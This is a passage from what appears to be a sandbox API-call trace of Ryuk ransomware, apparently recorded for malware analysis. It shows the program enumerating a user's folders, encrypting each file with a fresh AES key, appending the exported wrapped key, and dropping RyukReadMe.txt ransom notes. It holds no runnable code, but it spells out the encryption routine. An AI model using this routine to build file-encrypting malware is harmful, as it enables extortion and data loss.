pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0157.554] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0157.554] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0157.554] CloseHandle (hObject=0x18c) returned 1 [0157.580] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.584] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.584] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.584] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0157.584] SetLastError (dwErrCode=0x0) [0157.584] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0157.584] GetLastError () returned 0xb7 [0157.584] CloseHandle (hObject=0x18c) returned 1 [0157.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\ukRlP2Ec5c\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0157.585] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.585] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.585] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.585] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\ukRlP2Ec5c\\mUzhEb8eeyEXW9rCz.m4a", dwFileAttributes=0x80) returned 1 [0157.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\ukRlP2Ec5c\\mUzhEb8eeyEXW9rCz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\ukrlp2ec5c\\muzheb8eeyexw9rcz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.585] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=61059) returned 1 [0157.585] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=61059) returned 1 [0157.585] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xed61, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.585] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0157.586] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.586] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0157.586] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.586] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.586] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xee83, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xee83, lpOverlapped=0x0) returned 1 [0157.587] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0157.587] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xee83, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xee90) returned 1 [0157.588] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.588] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xee90, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xee90, lpOverlapped=0x0) returned 1 [0157.588] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0157.588] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.588] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.588] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0157.588] CloseHandle (hObject=0x190) returned 1 [0157.603] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.607] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.607] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.608] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.608] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.608] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\ukRlP2Ec5c\\rKNluhsspxHs7l.wav", dwFileAttributes=0x80) returned 1 [0157.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\ukRlP2Ec5c\\rKNluhsspxHs7l.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\ukrlp2ec5c\\rknluhsspxhs7l.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.608] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=7318) returned 1 [0157.608] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=7318) returned 1 [0157.608] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1b74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.608] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0157.609] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.609] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0157.609] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.609] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.609] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1c96, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x1c96, lpOverlapped=0x0) returned 1 [0157.609] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0157.609] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x1c96, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x1ca0) returned 1 [0157.610] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.610] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x1ca0, lpOverlapped=0x0) returned 1 [0157.610] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0157.610] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.610] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.610] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0157.610] CloseHandle (hObject=0x190) returned 1 [0157.630] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.634] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.634] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.634] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.634] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.634] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\ukRlP2Ec5c\\vex9.mp3", dwFileAttributes=0x80) returned 1 [0157.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\ukRlP2Ec5c\\vex9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\ukrlp2ec5c\\vex9.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.635] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=37962) returned 1 [0157.635] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=37962) returned 1 [0157.635] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x9328, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.635] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0157.636] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.636] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0157.636] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.636] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.636] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x944a, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x944a, lpOverlapped=0x0) returned 1 [0157.636] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0157.636] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x944a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x9450) returned 1 [0157.637] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.637] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9450, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x9450, lpOverlapped=0x0) returned 1 [0157.637] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0157.637] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.637] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0157.637] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0157.637] CloseHandle (hObject=0x190) returned 1 [0157.656] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.710] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.710] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.710] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0157.710] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0157.711] SetLastError (dwErrCode=0x0) [0157.711] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\ukRlP2Ec5c\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\ukrlp2ec5c\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0157.711] GetLastError () returned 0x0 [0157.711] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0157.712] CloseHandle (hObject=0x18c) returned 1 [0157.712] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0157.712] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0157.712] SetLastError (dwErrCode=0x0) [0157.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0157.712] GetLastError () returned 0xb7 [0157.712] CloseHandle (hObject=0x188) returned 1 [0157.712] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0157.712] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0157.712] SetLastError (dwErrCode=0x0) [0157.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0157.712] GetLastError () returned 0xb7 [0157.712] CloseHandle (hObject=0x184) returned 1 [0157.712] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.712] SetLastError (dwErrCode=0x0) [0157.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0157.713] GetLastError () returned 0xb7 [0157.713] CloseHandle (hObject=0x184) returned 1 [0157.713] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0157.713] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0157.713] SetLastError (dwErrCode=0x0) [0157.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0157.713] GetLastError () returned 0xb7 [0157.713] CloseHandle (hObject=0x184) returned 1 [0157.713] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.713] SetLastError (dwErrCode=0x0) [0157.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0157.713] GetLastError () returned 0xb7 [0157.713] CloseHandle (hObject=0x184) returned 1 [0157.713] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0157.713] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0157.713] SetLastError (dwErrCode=0x0) [0157.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0157.714] GetLastError () returned 0x0 [0157.714] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0157.715] CloseHandle (hObject=0x184) returned 1 [0157.715] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.715] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.715] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", dwFileAttributes=0x80) returned 1 [0157.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0157.715] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0157.715] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.715] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.715] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.716] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x80) returned 1 [0157.716] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0157.716] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0157.716] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.716] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.716] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.716] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", dwFileAttributes=0x80) returned 1 [0157.716] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0157.716] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0157.716] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.717] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.717] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.717] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x80) returned 1 [0157.717] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0157.717] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0157.717] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.717] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.717] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.717] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x80) returned 1 [0157.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0157.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0157.718] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.718] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0157.718] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.718] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x80) returned 1 [0157.718] CreateFileW 